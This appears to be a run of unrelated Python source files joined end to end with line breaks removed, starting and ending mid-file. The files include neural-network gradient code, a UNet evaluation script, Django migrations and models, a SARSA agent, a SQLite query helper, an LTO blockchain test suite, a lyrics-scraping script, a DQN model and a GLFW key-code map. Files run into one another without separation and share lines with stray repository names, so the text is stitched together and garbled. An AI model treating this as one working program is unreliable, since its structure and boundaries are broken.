-g.batch_jacobian(psi, x)[..., 0] p_x = g.batch_jacobian(p, x)[..., 0] p_y = g.batch_jacobian(p, y)[..., 0] del g u_x = gg.batch_jacobian(u, x)[..., 0] u_y = gg.batch_jacobian(u, y)[..., 0] v_x = gg.batch_jacobian(v, x)[..., 0] v_y = gg.batch_jacobian(v, y)[..., 0] del gg u_xx = ggg.batch_jacobian(u_x, x)[..., 0] u_yy = ggg.batch_jacobian(u_y, y)[..., 0] v_xx = ggg.batch_jacobian(v_x, x)[..., 0] v_yy = ggg.batch_jacobian(v_y, y)[..., 0] del ggg p_grads = p, p_x, p_y u_grads = u, u_x, u_y, u_xx, u_yy v_grads = v, v_x, v_y, v_xx, v_yy return psi, p_grads, u_grads, v_grads import os import datetime import argparse import torch from model import UNet from dataset import EvalDataset import utils from utils_time import TimeEstimator if __name__ == '__main__': ## Parse arguments parser = argparse.ArgumentParser() parser.add_argument('--pretrained_weights', type=str, default='pretrained/unet_epoch20.pth', help='path to pretrained model weights') parser.add_argument('--input_image_dir', type=str, default='eval/images', help='directory containing images to segment') parser.add_argument('--output_label_dir', type=str, default='eval/labels', help='directory to save segments') parser.add_argument('--num_workers', type=int, default=4, help='(only for gpu) number of cpu workers for DataLoader') opt = parser.parse_args() ## initialize os.makedirs(opt.output_label_dir, exist_ok=True) use_cuda = torch.cuda.is_available() if use_cuda: device = torch.device('cuda') else: device = torch.device('cpu') opt.num_workers = 0 print("Device: {}".format(device)) ## --------------------------------------------------------------------------- ## load model net = UNet() pretrained_dict = torch.load(opt.pretrained_weights, map_location=device) net.load_state_dict(pretrained_dict) net = net.to(device) ## load data evalset = EvalDataset(opt.input_image_dir) evalloader = torch.utils.data.DataLoader(evalset, num_workers=opt.num_workers, pin_memory=use_cuda) print("Number of evaluation images: {}".format(len(evalloader))) timeEstimator = TimeEstimator(len(evalloader)) ## --------------------------------------------------------------------------- ## === evaluate === net.eval() for batch_i, (image, name) in enumerate(evalloader): image = image.to(device) with torch.no_grad(): out = net(image) label = out.argmax(1) ## save label as image ## TODO: save label in original dimensions as palettised png, or other convenient form label = label[0].cpu().numpy() label_img = utils.label_to_image(label) filename = os.path.join(opt.output_label_dir, name[0]+'.png') utils.save_image(filename, label_img) delta_t, remaining_t = timeEstimator.update() print("EVAL | Batch {}/{} | {:.2f} sec | {} remaining".format( batch_i+1, len(evalloader), delta_t, datetime.timedelta(seconds=remaining_t) )) total_t = timeEstimator.total() print("Total Elapsed Time: {}".format(datetime.timedelta(seconds=total_t))) ilvar/lotien0 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('content', '0002_auto_20150406_0221'), ] operations = [ migrations.AddField( model_name='sliderimage', name='title', field=models.CharField(max_length=255, null=True, verbose_name='\u041f\u043e\u0434\u043f\u0438\u0441\u044c'), ), ] import click import os from click_repl import repl from prompt_toolkit.history import FileHistory from ..utils.logging import logger from ..utils.exceptions import handle_exceptions @click.command() def main(): ''' Start an interactive shell. All commands and subcommands are available in it. If stdin is not a TTY, no prompt will be printed, but only commands read from stdin. ''' prompt_kwargs = { 'history': FileHistory(os.path.expanduser('~/.termicoder-history')), } repl(click.get_current_context(), prompt_kwargs=prompt_kwargs) #!/usr/bin/env python # -*- coding: utf-8 -*- # # SARSA(λ) agent import numpy as np from gym_trainer.helpers.utils import epsilon_greedy, get_decayed_param class TableSarsaLambdaAgent: def __init__(self, dim_obs, dim_action, obs_min, obs_max, n_disc, lr=0.1, gamma=0.99, eps_ini=0.8, eps_inf=0.1, eps_decay_rate=0.99, _lambda=0.7): """ Args: dim_obs (int): dimension of observation dim_action (int): dimension of action obs_min (list): list of min value for each dimension obs_max (list): list of max value for each dimension n_disc (int): number of discretization lr (float): learning rate gamma (float): discount factor eps_ini (float): initial epsilon value eps_inf (float): stationary epsilon value eps_decay_rate (float): decay rate for epsilon value _lambda (float): parameter for calculating λ-return """ self.dim_obs = dim_obs self.dim_action = dim_action assert len(obs_min) == dim_obs assert len(obs_max) == dim_obs self.obs_min = obs_min self.obs_max = obs_max self.n_disc = n_disc self.lr = lr self.gamma = gamma assert eps_ini + eps_inf <= 1.0 self.eps_ini = eps_ini self.eps_inf = eps_inf self.eps_decay_rate = eps_decay_rate self._lambda = _lambda self.q = np.zeros(((2 * n_disc) ** dim_obs, dim_action)) self.e = np.zeros(((2 * n_disc) ** dim_obs, dim_action)) # eligibility trace def reset(self, observation, i_episode): self.e = np.zeros(((2*self.n_disc)**self.dim_obs, self.dim_action)) state = self.get_state(observation) action = self.get_action(state, i_episode) return action def step(self, obs, action, obs_next, reward, i_episode): """agent step when training Args: obs: previous observation action: action agent took given obs obs_next: next observation agent got reward: reward agent got i_episode (int): index of episode Returns: """ state = self.get_state(obs) state_next = self.get_state(obs_next) action_next = self.get_action(state_next, i_episode) delta = reward + self.gamma * self.q[state_next, action_next] - self.q[state, action] self.e[state, action] += 1 for i in range(self.n_disc**self.dim_obs): for j in range(self.dim_action): self.q[i, j] += self.lr * delta * self.e[i, j] self.e[i, j] = self.gamma * self._lambda * self.e[i, j] return action_next def step_inference(self, obs): state = self.get_state(obs) action = self.get_action_inference(state) return action def get_action(self, state, i_episode): # follow ε-greedy policy eps = get_decayed_param(self.eps_ini, self.eps_inf, self.eps_decay_rate, i_episode) action = epsilon_greedy(eps, list(self.q[state, :])) return action def get_action_inference(self, state): action = np.argmax(self.q[state, :]) return action 1-10 import ntpath import sqlite3 import sys import time from datetime import datetime from pathlib import Path from sqlite3 import Error from logzero import logger class Database(object): def __init__(self, dbfiles, disabled, scan_datetime, expiration_days): # Create array of file path(s) to database file(s) self._dbfiles = [] for dbfile in dbfiles: self._dbfiles.append(Path(dbfile)) self._expirationDays = str(expiration_days) self._disabledSqlQuery = "0" if disabled is False: self._disabledSqlQuery = "1" self._flagScanDateTime = scan_datetime['override'] self._progressIndex = 0 self._metricName = None # Set the value below to increase performance for larger data sets # Note: This is the amount of SQLite VMs per progress report - NOT RESULTS! self._progressIncrement = 100000 # Parse scan date & time if no override detected self._scanDateTime = [] i = 0 if not self._flagScanDateTime: for dbfile in self._dbfiles: # Split to arrays dbFileName = ntpath.basename(dbfile) dbFileNameSplit = dbFileName.split("_") dnaIndex = dbFileNameSplit.index("DNA") dIndex = dnaIndex + 1 tIndex = dIndex + 1 dbFileTimeSplit = dbFileNameSplit[tIndex].split(".") try: # Format as proper datetime value inScanTime = datetime.strptime(dbFileTimeSplit[0].replace("-", " "), "%I %M %S %p") except ValueError: print("DNAmic Analysis does not support 24-hour format in DNA database filenames:", dbFileTimeSplit[0]) print("FIX: Either change the filename to 12-hour format or change your config YAML to override scan datetime.") print("--------------------------") raise # Strip 1900-01-01 placemarker date and format to 24-hour scanTime = datetime.strftime(inScanTime, "%H:%M:%S") # Combine datetime for SQL query self._scanDateTime.append(dbFileNameSplit[dIndex] + " " + scanTime) logger.info("Parsed scan datetime from database filename: {}".format(self._scanDateTime[i])) i = i + 1 else: for dbfile in self._dbfiles: self._scanDateTime.append(scan_datetime['manual_scan_datetime']) logger.info("Manual override detected, received scan datetime as: {}".format(self._scanDateTime[i])) i = i + 1 def progress_handler(self): """ Handles progress animation during SQLite database queries """ self._progressIndex += 1 print("{} Processing... [{}]".format(self._metricName, self._progressIndex), end="\r", flush=True) def create_connection(self, dbfile): """ Create a database connection to the SQLite database """ try: conn = sqlite3.connect(dbfile) logger.info("Successfully connected to SQLite3 database at {}".format(dbfile)) return conn except Error as e: logger.exception(e) return None def exec_fromfile(self, sqlfile, metric_name, regex_flag=False, regex_array=None): """ Executes the query from a SQL file and returns all rows """ # Open and read the SQL file as a single buffer try: with open(sqlfile, 'r') as file: sqlQuery = file.read() logger.info("Opened & read {}".format(sqlfile)) except Exception as e: logger.exception(e) ################################################################ # BEGIN FOR LOOP ON SQLITE CONNECTIONS ################################################################ i = 0 all_fetched_rows = [] for dbfile in self._dbfiles: # Create database connection try: conn = self.create_connection(dbfile) self._metricName = metric_name conn.set_progress_handler(self.progress_handler, self._progressIncrement) # Create a cursor for the database connection c = conn.cursor() logger.info("Created database connection cursor") except Error as e: logger.exception(e) try: # Make replacement in SQL query sqlQueryDT = sqlQuery.replace("{scanDateTime}", self._scanDateTime[i]) sqlQueryExpire = sqlQueryDT.replace("{expirationDays}", self._expirationDays) # Replace disabled section of SQL query sqlQueryFinal = sqlQueryExpire.replace("{disabled}", self._disabledSqlQuery) except Exception as e: logger.exception(e) # Execute the SQL query logger.info("Starting query execution and analysis.") if regex_flag: try: whereStmt = "" counter = 0 for regex in regex_array: if counter == 0: whereStmt += "Accounts.Name LIKE '{}' ".format(regex.replace('^','%')) else: whereStmt += "OR Accounts.Name LIKE '{}' ".format(regex.replace('^','%')) counter += 1 c.execute(sqlQueryFinal.replace("{whereStmt}", whereStmt)) logger.info("Executed {} on SQLite3 database successfully".format(sqlQueryFinal.replace("{whereStmt}", whereStmt))) except Error as e: logger.exception(e) else: # Execute the SQL query try: c.execute(sqlQueryFinal) logger.info("Executed {} on SQLite3 database successfully".format(sqlQueryFinal)) except Error as e: logger.exception(e) # Fetch all rows returned from SQL query try: current_fetched_rows = c.fetchall() row_count = len(current_fetched_rows) if row_count > 0: all_fetched_rows = all_fetched_rows + current_fetched_rows logger.info("Fetched {} rows".format(row_count)) except Error as e: logger.exception(e) finally: print("\nFinished processing {} on {} finding {} row(s).".format(self._metricName, dbfile, row_count), flush=True) self._progressIndex = 0 conn.close() i = i + 1 ################################################################ # END FOR LOOP ON SQLITE CONNECTIONS ################################################################ # Return all rows returned from SQL query return all_fetched_rows # MIT License # # Copyright (c) 2021 and and # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from dataclasses import dataclass, field from openspeech.dataclass.configurations import OpenspeechDataclass @dataclass class Jasper10x5Config(OpenspeechDataclass): r""" This is the configuration class to store the configuration of a :class:`~openspeech.models.Jasper10x5`. It is used to initiated an `Jasper10x5` model. Configuration objects inherit from :class: `~openspeech.dataclass.configs.OpenspeechDataclass`. Configurations: model_name (str): Model name (default: jasper10x5) num_blocks (int): Number of jasper blocks (default: 10) num_sub_blocks (int): Number of jasper sub blocks (default: 5) in_channels (str): Output channels of jasper block's convolution out_channels (str): Output channels of jasper block's convolution kernel_size (str): Kernel size of jasper block's convolution dilation (str): Dilation of jasper block's convolution dropout_p (str): Dropout probability optimizer (str): Optimizer for training. """ model_name: str = field( default="jasper10x5", metadata={"help": "Model name"} ) num_blocks: int = field( default=10, metadata={"help": "Number of jasper blocks"} ) num_sub_blocks: int = field( default=5, metadata={"help": "Number of jasper sub blocks"} ) in_channels: str = field( default="(None, 256, 256, 256, 384, 384, 512, 512, 640, 640, 768, 768, 896, 1024)", metadata={"help": "Input channels of jasper blocks"} ) out_channels: str = field( default="(256, 256, 256, 384, 384, 512, 512, 640, 640, 768, 768, 768, 896, 1024, None)", metadata={"help": "Output channels of jasper block's convolution"} ) kernel_size: str = field( default="(11, 11, 11, 13, 13, 17, 17, 21, 21, 25, 25, 29, 1, 1)", metadata={"help": "Kernel size of jasper block's convolution"} ) dilation: str = field( default="(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1)", metadata={"help": "Dilation of jasper block's convolution"} ) dropout_p: str = field( default="(0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.3, 0.3, 0.3, 0.3, 0.4, 0.4, 0.0)", metadata={"help": "Dropout probability"} ) optimizer: str = field( default="novograd", metadata={"help": "Optimizer for training."} ) # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-04-15 16:18 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [("meupet", "0033_remove_status_field")] operations = [migrations.RenameField(model_name="pet", old_name="new_status", new_name="status")] from django.db import models from django.utils import timezone from .management import dummymodel from .user import User class Todo(models.Model): assignee = models.ForeignKey('Person', on_delete=models.CASCADE, related_name='todos') id = models.AutoField(primary_key=True) title = models.CharField(max_length=255) description = models.CharField(max_length=1024, null=True) due_date = models.DateField(null=True, default=timezone.now) done = models.BooleanField(null=True) class Comment(models.Model): READ = 1 UNREAD = 2 STATUS_CHOICES = [ (READ, 'READ'), (UNREAD, 'UNREAD') ] todo = models.ForeignKey('Todo', on_delete=models.CASCADE, related_name='comments') id = models.AutoField(primary_key=True) message = models.CharField(max_length=512, null=True) submitted = models.DateField(null=True, default=timezone.now) status = models.IntegerField(choices=STATUS_CHOICES, null=True) class Person(models.Model): id = models.AutoField(primary_key=True) email = models.CharField(max_length=100, null=True) firstname = models.CharField(max_length=100, null=True) lastname = models.CharField(max_length=100, null=True) last_login = models.DateField(null=True, default=timezone.now) sphinx_markdown/nodes.py import os from docutils import nodes import markdown from sphinx_markdown.extensions.images import StaticImagesExtension class MarkdownNode(nodes.raw, nodes.Element): """HTML container for markdown contents """ filename = '' htmlcontent = '' extensions = [] def load_markdown(self): """Save the markdown contents to this node """ with open(self.filename) as handle: handle.readline() text = unicode(handle.read().decode('utf-8')) static_dir = os.path.relpath('_static', start=os.path.dirname(self.filename)) sphinx_md_ext = StaticImagesExtension(static_dir=static_dir) extensions = [sphinx_md_ext]+self.extensions self.htmlcontent = markdown.markdown(text, extensions=extensions) def astext(self): return self.htmlcontent def visit_markdown_node(document, node): document.body.append(node.htmlcontent) def depart_markdown_node(document_, node_): pass from rlberry.utils.jit_setup import numba_jit @numba_jit def bounds_contains(bounds, x): """ Returns True if `x` is contained in the bounds, and False otherwise. Parameters ---------- bounds : numpy.ndarray Array of shape (d, 2). Bounds of each dimension [ [x0, y0], [x1, y1], ..., [xd, yd] ], representing the following cartesian product in R^d: [x0, y0] X [x1, y1] X ... X [xd, yd]. x : numpy.ndarray Array of shape (d,) """ dim = x.shape[0] for dd in range(dim): if x[dd] < bounds[dd, 0] or x[dd] > bounds[dd, 1]: return False return True def split_bounds(bounds, dim=0): """ Split an array representing an l-infinity ball in R^d in R^d into a list of 2^d arrays representing the ball split. Parameters ---------- bounds : numpy.ndarray Array of shape (d, 2). Bounds of each dimension [ [x0, y0], [x1, y1], ..., [xd, yd] ], representing the cartesian product in R^d: [x0, y0] X [x1, y1] X ... X [xd, yd]. dim : int, default: 0 Dimension from which to start splitting. Returns ------- List of arrays of shape (d, 2) containing the bounds to be split. """ if dim == bounds.shape[0]: return [bounds] left = bounds[dim, 0] right = bounds[dim, 1] middle = (left+right)/2.0 left_interval = bounds.copy() right_interval = bounds.copy() left_interval[dim, 0] = left left_interval[dim, 1] = middle right_interval[dim, 0] = middle right_interval[dim, 1] = right return split_bounds(left_interval, dim+1) + split_bounds(right_interval, dim+1) ltonetwork/lto-api.python from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory from LTO.Transactions.Association import Association from unittest import mock from time import time class TestAssociation: ACCOUNT_SEED = "" account = AccountFactory('T').createFromSeed(ACCOUNT_SEED) def testContruct(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1) assert transaction.txFee == 100000000 assert transaction.associationType == 1 assert transaction.recipient == '3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1' def testSignWith(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1) assert transaction.isSigned() is False transaction.signWith(self.account) assert transaction.isSigned() is True timestamp = int(time() * 1000) assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3] assert transaction.sender == '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2' assert transaction.senderPublicKey == '' assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0]) def expectedV1(self): return({'associationType': 1, 'fee': 100000000, 'hash': 'HiorsQW6E76Cp4AD51zcKcWu644ZzzraXQL286Jjzufh7U7qJroTKt7KMMpv', 'proofs': [''], 'recipient': '', 'sender': '', 'senderPublicKey': '', 'timestamp': 1629883934685, 'type': 16, 'version': 1}) def expectedV3(self): return({ "type": 16, "version": 3, "sender": "", "senderKeyType": "ed25519", "senderPublicKey": '', "recipient": '', "associationType": 1, "hash": 'HiorsQW6E76Cp4AD51zcKcWu644ZzzraXQL286Jjzufh7U7qJroTKt7KMMpv', "timestamp": 1629883934685, "expires": 1841961856000, "fee": 100000000, "proofs": [''], }) def testToJson(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='', expires= 1841961856000) #transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='', expires=1841961856000) transaction.timestamp = 1629883934685 transaction.signWith(self.account) if transaction.version == 1: expected = self.expectedV1() elif transaction.version == 3: expected = self.expectedV3() else: expected = '' assert transaction.toJson() == expected @mock.patch('src.LTO.PublicNode') def testBroadcast(self, mock_Class): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='') broadcastedTransaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='') broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi' mc = mock_Class.return_value mc.broadcast.return_value = broadcastedTransaction assert mc.broadcast(transaction) == broadcastedTransaction def testFromData(self): data = { "type": 16, "version": 3, "recipient": "3N9ChkxWXqgdWLLErWFrSwjqARB6NtYsvZh", "associationType": 1, "hash": "3yMApqCuCjXDWPrbjfR5mjCPTHqFG8Pux1TxQrEM35jj", "id": "1uZqDjRjaehEceSxrVxz6WD6wt8su8TBHyDLQ1KFnJo", "sender": "3NBcx7AQqDopBj3WfwCVARNYuZyt1L9xEVM", "senderPublicKey": "", "timestamp": 1610404930000, "expires": 1841961856000, "fee": 100000000, "proofs": [ "" ], "height": 1225712 } transaction = Association(recipient='', associationType='').fromData(data) for key in data: assert data[key] == transaction.__getattr__(key) libbyh/jekyll-now-demo import billboard import json import urllib from urllib.parse import quote apikey = 'APIKEY' # make the empty dictionary songs = {} # loop through the years we're interested in for x in range(1960, 2016): # another dictionary inside songs[x] = {} # get the chart for the last week of that year chart = billboard.ChartData('hot-100', '%s-12-19' % str(x)) # for every song on the chart, keep its rank, title, and author for song in chart: songs[x][song.rank] = {} songs[x][song.rank]['rank'] = song.rank songs[x][song.rank]['title'] = song.title songs[x][song.rank]['artist'] = song.artist # look up the song in musixmatch api_url = "http://api.musixmatch.com/ws/1.1/matcher.track.get?apikey=%s&q_artist=%s&q_track=%s" % (apikey, quote(song.artist, safe=''), quote(song.title, safe='')) url = urllib.request.urlopen(api_url).read().decode('UTF-8') result = json.loads(url) songs[x][song.rank]['musixmatch'] = result # use lyrics id to get lyrics info and store that instead of all the junk from musixmatch api_url_lyrics = "http://api.musixmatch.com/ws/1.1/matcher.lyrics.get?apikey=%s&q_track=%s&q_artist=%s" % (apikey, quote(song.title, safe=''), quote(song.artist, safe='')) url_lyrics = urllib.request.urlopen(api_url_lyrics).read().decode('UTF-8') lyrics = json.loads(url_lyrics) #checks against any songs not in MusixMatch database and any songs without lyrics if result['message']['header']['status_code'] != 404 and result['message']['body']['track']['has_lyrics'] == 1: lyrics_id = result['message']['body']['track']['lyrics_id'] get_lyrics = lyrics['message']['body']['lyrics']['lyrics_body'] songs[x][song.rank]['lyrics'] = get_lyrics #dump all the data to a json file (readable output) with open('song-data.json', 'w') as out_file: for x in sorted(songs): out_file.write('>') json.dump(x, out_file) out_file.write('\n') for y in songs[x]: if 'lyrics' in songs[x][y]: out_file.write('(') json.dump(y, out_file) out_file.write(') ' + songs[x][y]['title'] + ' - ' + songs[x][y]['artist']) out_file.write('\n') json.dump(songs[x][y]['lyrics'].replace('\n', ' '), out_file) out_file.write('\n') out_file.write('\n') rest_framework_docs/views.py from django.http import Http404 from django.views.generic.base import TemplateView from rest_framework_docs.api_docs import ApiDocumentation from rest_framework_docs.settings import DRFSettings class DRFDocsView(TemplateView): template_name = "rest_framework_docs/home.html" drf_router = None def get_context_data(self, filter_param=None, **kwargs): settings = DRFSettings().settings if settings["HIDE_DOCS"]: raise Http404("Django Rest Framework Docs are hidden. Check your settings.") context = super(DRFDocsView, self).get_context_data(**kwargs) docs = ApiDocumentation(drf_router=self.drf_router, filter_param=filter_param) endpoints = docs.get_endpoints() query = self.request.GET.get("search", "") if query and endpoints: endpoints = [endpoint for endpoint in endpoints if query in endpoint.path] context['query'] = query context['endpoints'] = endpoints return context 1-10 import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.autograd import Variable class DQN(nn.Module): def __init__(self, number_actions): super(DQN, self).__init__() self.convolution1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5) self.convolution2 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3) self.convolution3 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3) self.convolution4 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=2) self.fc1 = nn.Linear(in_features=self.count_neurons((1, 320, 240)), out_features=40) self.fc2 = nn.Linear(in_features=40, out_features=40) self.fc3 = nn.Linear(in_features=40, out_features=number_actions) def count_neurons(self, image_dim): x = Variable(torch.rand(1, *image_dim)) x = F.relu(F.max_pool2d(self.convolution1(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution2(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution3(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution4(x), 3, 2)) return x.data.view(1, -1).size(1) def forward(self, x): x = F.relu(F.max_pool2d(self.convolution1(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution2(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution3(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution4(x), 3, 2)) x = x.view(x.size(0), -1) x = F.relu(self.fc1(x)) x = self.fc2(x) x = self.fc3(x) return xfrom __future__ import annotations from enum import IntEnum, IntFlag import glfw class MouseButton(IntFlag): NONE = 0 Left = 1 << 1 Middle = 1 << 2 Right = 1 << 3 @classmethod def from_glfw_mouse_btn_code(cls, btn_code): return _MOUSE_MAP[btn_code] class KeyModifier(IntFlag): NONE = 0 Shift = 1 << 0 Ctrl = 1 << 1 Alt = 1 << 2 Super = 1 << 5 @classmethod def from_glfw_modifiers(cls, mods): modifiers = cls.NONE if mods & glfw.MOD_SHIFT: modifiers |= cls.Shift if mods & glfw.MOD_CONTROL: modifiers |= cls.Ctrl if mods & glfw.MOD_ALT: modifiers |= cls.Alt if mods & glfw.MOD_SUPER: modifiers |= cls.Super return modifiers class KeyCode(IntEnum): Space = 32 Apostrophe = 39 # ' Comma = 44 # , Minus = 45 # - Period = 46 # . Slash = 47 # / Num0 = 48 Num1 = 49 Num2 = 50 Num3 = 51 Num4 = 52 Num5 = 53 Num6 = 54 Num7 = 55 Num8 = 56 Num9 = 57 Semicolon = 59 # ; Equal = 61 # = A = 65 B = 66 C = 67 D = 68 E = 69 F = 70 G = 71 H = 72 I = 73 J = 74 K = 75 L = 76 M = 77 N = 78 O = 79 P = 80 Q = 81 R = 82 S = 83 T = 84 U = 85 V = 86 W = 87 X = 88 Y = 89 Z = 90 LeftBracket = 91 # [ Backslash = 92 # \ RightBracket = 93 # ] GraveAccent = 96 # ` Escape = 256 Enter = 257 Tab = 258 Backspace = 259 Delete = 261 Right = 262 Left = 263 Down = 264 Up = 265 PageUp = 266 PageDown = 267 Home = 268 End = 269 CapsLock = 280 F1 = 290 F2 = 291 F3 = 292 F4 = 293 F5 = 294 F6 = 295 F7 = 296 F8 = 297 F9 = 298 F10 = 299 F11 = 300 F12 = 301 Keypad0 = 320 Keypad1 = 321 Keypad2 = 322 Keypad3 = 323 Keypad4 = 324 Keypad5 = 325 Keypad6 = 326 Keypad7 = 327 Keypad8 = 328 Keypad9 = 329 KeypadDecimal = 330 KeypadDivide = 331 KeypadMultiply = 332 KeypadSubtract = 333 KeypadAdd = 334 KeypadEnter = 335 KeypadEqual = 336 LeftShift = 1 << 9 LeftControl = 1 << 10 LeftAlt = 1 << 11 LeftSuper = 1 << 12 RightShift = 1 << 13 RightControl = 1 << 14 RightAlt = 1 << 15 RightSuper = 1 << 16 Menu = 348 @classmethod def from_glfw_keycode(cls, keycode): if keycode in _KEY_MAP: return _KEY_MAP[keycode] _KEY_MAP = { glfw.KEY_SPACE: KeyCode.Space, glfw.KEY_APOSTROPHE: KeyCode.Apostrophe, glfw.KEY_COMMA: KeyCode.Comma, glfw.KEY_MINUS: KeyCode.Minus, glfw.KEY_PERIOD: KeyCode.Period, glfw.KEY_SLASH: KeyCode.Slash, glfw.KEY_0: KeyCode.Num0, glfw.KEY_1: KeyCode.Num1, glfw.KEY_2: KeyCode.Num2, glfw.KEY_3: KeyCode.Num3, glfw.KEY_4: KeyCode.Num4, glfw.KEY_5: KeyCode.Num5, glfw.KEY_6: KeyCode.Num6, glfw.KEY_7: KeyCode.Num7, glfw.KEY_8: KeyCode.Num8, glfw.KEY_9: KeyCode.Num9, glfw.KEY_SEMICOLON: KeyCode.Semicolon, glfw.KEY_EQUAL: KeyCode.Equal, glfw.KEY_A: KeyCode.A, glfw.KEY_B: KeyCode.B, glfw.KEY_C: KeyCode.C, glfw.KEY_D: KeyCode.D, glfw.KEY_E: KeyCode.E, glfw.KEY_F: KeyCode.F, glfw.KEY_G: KeyCode.G, glfw.KEY_H: KeyCode.H, glfw.KEY_I: KeyCode.I, glfw.KEY_J: KeyCode.J, glfw.KEY_K: KeyCode.K, glfw.KEY_L: KeyCode.L, glfw.KEY_M: KeyCode.M, glfw.KEY_N: KeyCode.N, glfw.KEY_O: KeyCode.O, glfw.KEY_P: KeyCode.P, glfw.KEY_Q: KeyCode.Q, glfw.KEY_R: KeyCode.R, glfw.KEY_S: KeyCode.S, glfw.KEY_T: KeyCode.T, glfw.KEY_U: KeyCode.U, glfw.KEY_V: KeyCode.V, glfw.KEY_W: KeyCode.W, glfw.KEY_X: KeyCode.X, glfw.KEY_Y: KeyCode.Y, glfw.KEY_Z: KeyCode.Z, glfw.KEY_LEFT_BRACKET: KeyCode.LeftBracket, glfw.KEY_BACKSLASH: KeyCode.Backslash, glfw.KEY_RIGHT_BRACKET: KeyCode.RightBracket, glfw.KEY_GRAVE_ACCENT: KeyCode.GraveAccent, glfw.KEY_ESCAPE: KeyCode.Escape, glfw.KEY_ENTER: KeyCode.Enter, glfw.KEY_TAB: KeyCode.Tab, glfw.KEY_BACKSPACE: KeyCode.Backspace, glfw.KEY_DELETE: KeyCode.Delete, glfw.KEY_RIGHT: KeyCode.Right, glfw.KEY_LEFT: KeyCode.Left, glfw.KEY_DOWN: KeyCode.Down, glfw.KEY_UP: KeyCode.Up, glfw.KEY_PAGE_UP: KeyCode.PageUp, glfw.KEY_PAGE_DOWN: KeyCode.PageDown, glfw.KEY_HOME: KeyCode.Home, glfw.KEY_END: KeyCode.End, glfw.KEY_CAPS_LOCK: KeyCode.CapsLock, glfw.KEY_F1: KeyCode.F1, glfw.KEY_F2: KeyCode.F2, glfw.KEY_F3: KeyCode.F3, glfw.KEY_F4: KeyCode.F4, glfw.KEY_F5: KeyCode.F5, glfw.KEY_F6: KeyCode.F6, glfw.KEY_F7: KeyCode.F7, glfw.KEY_F8: KeyCode.F8, glfw.KEY_F9: KeyCode.F9, glfw.KEY_F10: KeyCode.F10, glfw.KEY_F11: KeyCode.F11, glfw.KEY_F12: KeyCode.F12, glfw.KEY_KP_0: KeyCode.Keypad0, glfw.KEY_KP_1: KeyCode.Keypad1, glfw.KEY_KP_2: KeyCode.Keypad2, glfw.KEY_KP_3: KeyCode.Keypad3, glfw.KEY_KP_4: KeyCode.Keypad4, glfw.KEY_KP_5: KeyCode.Keypad5, glfw.KEY_KP_6: KeyCode.Keypad6, glfw.KEY_KP_7: KeyCode.Keypad7, glfw.KEY_KP_8: KeyCode.Keypad8, glfw.KEY_KP_9: KeyCode.Keypad9, glfw.KEY_KP_DECIMAL: KeyCode.KeypadDecimal, glfw.KEY_KP_DIVIDE: KeyCode.KeypadDivide, glfw.KEY_KP_MULTIPLY: KeyCode.KeypadMultiply, glfw.KEY_KP_SUBTRACT: KeyCode.KeypadSubtract, glfw.KEY_KP_ADD: KeyCode.KeypadAdd, glfw.KEY_KP_ENTER: KeyCode.KeypadEnter, glfw.KEY_KP_EQUAL: KeyCode.KeypadEqual, glfw.KEY_LEFT_SHIFT: KeyCode.LeftShift, glfw.KEY_LEFT_CONTROL: KeyCode.LeftControl, glfw.KEY_LEFT_ALT: KeyCode.LeftAlt, glfw.KEY_LEFT_SUPER: KeyCode.LeftSuper, glfw.KEY_RIGHT_SHIFT: KeyCode.RightShift, glfw.KEY_RIGHT_CONTROL: KeyCode.RightControl, glfw.KEY_RIGHT_ALT: KeyCode.RightAlt, glfw.KEY_RIGHT_SUPER: KeyCode.RightSuper, glfw.KEY_MENU: KeyCode.Menu } _MOUSE_MAP = { glfw.MOUSE_BUTTON_LEFT: MouseButton.Left, 